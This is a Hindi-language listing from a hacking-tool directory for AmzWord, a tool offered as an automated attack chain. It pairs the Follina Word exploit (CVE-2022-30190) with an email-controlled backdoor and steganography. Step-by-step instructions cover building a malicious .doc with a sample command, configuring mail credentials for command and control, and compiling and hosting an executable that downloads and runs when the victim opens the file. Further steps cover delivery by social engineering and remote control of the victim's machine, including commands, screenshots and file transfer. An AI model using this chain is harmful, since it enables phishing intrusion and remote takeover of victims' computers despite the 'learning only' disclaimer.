Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/jump-wang-111/amzword
फ़िशिंग उपकरणपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणस्टेग्नोग्राफीकमांड एंड कंट्रोलसामाजिक इंजीनियरिंगलर्निंग और शिक्षाईमेल सुरक्षा
GitHubjump-wang-111/amzword

AmzWord

CVE-2022-30190, 163 ईमेल बैकडोर, और इमेज स्टेग्नोग्राफी पर आधारित एक स्वचालित हमला श्रृंखला।

12102 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

AmzWord

CVE-2022-30190, 163 ईमेल बैकडोर और इमेज स्टेग्नोग्राफ़ी पर आधारित एक स्वचालित अटैक चेन

निम्नलिखित github रिपॉजिटरी के लिए धन्यवाद, हमने अपने कार्य को एकीकृत और कार्यान्वित करने के लिए कोड के कुछ हिस्से को संदर्भित और संशोधित किया है:

  • gdog
  • follina
  • virtual-reality

中文README请看这里

आवश्यकताएँ

gdog:

  • Python 2.7
  • PyCrypto मॉड्यूल
  • WMI मॉड्यूल
  • Enum34 मॉड्यूल
  • Netifaces मॉड्यूल

follina:

  • Python 3.x

उपयोग और अटैक प्रक्रिया

  1. एक दुर्भावनापूर्ण word फ़ाइल बनाने और http लिसनिंग चालू करने के लिए follina.py का उपयोग करें

    • आप कोड में डिफ़ॉल्ट नाम और डिफ़ॉल्ट ip बदल सकते हैं
    • आप --ip और --output का भी उपयोग कर सकते हैं
    • विस्तृत उपयोग के लिए कृपया follina देखें। हमने उपयोग इंटरफ़ेस नहीं बदला है।
    • उदा: python follina.py --ip 100.100.100.100 --output maldoc.doc
  2. gdog के अंतर्गत client.py और gdog.py को संशोधित करें और निम्नलिखित जानकारी भरें

    root@kitploit:~
    gmail_user = 'your email'
    gmail_pwd = 'your pwd'
    server = "smtp server"
    imap_server = 'imap server'
    
  3. client.py को संकलित करके tar.exe बनाएं और इसे /follina/www के अंतर्गत रखें

  4. इसे लक्ष्य तक पहुँचाने के लिए किसी भी सोशल इंजीनियरिंग विधि का उपयोग करें। जैसे ही पीड़ित word खोलता है, tar.exe स्वचालित रूप से डाउनलोड और निष्पादित हो जाएगा।

  5. हमलावर स्थानीय रूप से gdog चलाता है और लक्ष्य मशीन को नियंत्रित करने के लिए कमांड भेजता है। उपयोग के लिए, gdog देखें

टिप्पणी

  1. यह केवल अटैक चेन कार्यान्वयन का एक डेमो है। चल रहा exe टास्क मैनेजर में भी पाया जा सकता है, जिससे प्रभाव का निरीक्षण करना आसान हो जाता है। हमने एंटी-वायरस, छिपाने और विशेषाधिकार वृद्धि जैसे कोई ऑपरेशन नहीं किए। बेशक, विंडोज़ पर ये मुश्किल भी नहीं हैं, है ना?
  2. gdog प्रोजेक्ट काफी समय से मौजूद है, और हमने इसे सफलतापूर्वक चलाने के लिए बहुत प्रयास किए हैं। वर्तमान में पुष्टि किए गए रिमोट कंट्रोल कमांड में शामिल हैं: कमांड निष्पादित करना, स्क्रीनशॉट लेना, पॉप-अप विंडो, शट डाउन, स्क्रीन लॉक करना और फ़ाइल स्थानांतरित करना। ये फ़ंक्शन अधिकांश आवश्यकताओं के लिए पर्याप्त हैं।
  3. मुझे नहीं पता क्यों, लेकिन imap की SUBJECT खोज में कुछ समस्या लगती है। हम लक्षित विषय वाले ईमेल खोज नहीं सकते हैं, और वापसी मान खाली है। हम केवल अन्य तरीके अपना सकते हैं, जैसे सभी अपठित ईमेल पढ़ना, लक्ष्यों को फ़िल्टर करना, और फिर दूसरों को अपठित के रूप में सेट करना। जब कई नियंत्रित उपयोगकर्ता हों तो यह समस्या पैदा कर सकता है और इसे हल करने की आवश्यकता है।
  4. यह प्रोजेक्ट केवल सीखने और आदान-प्रदान के उद्देश्यों के लिए है।
टूल डाउनलोड करें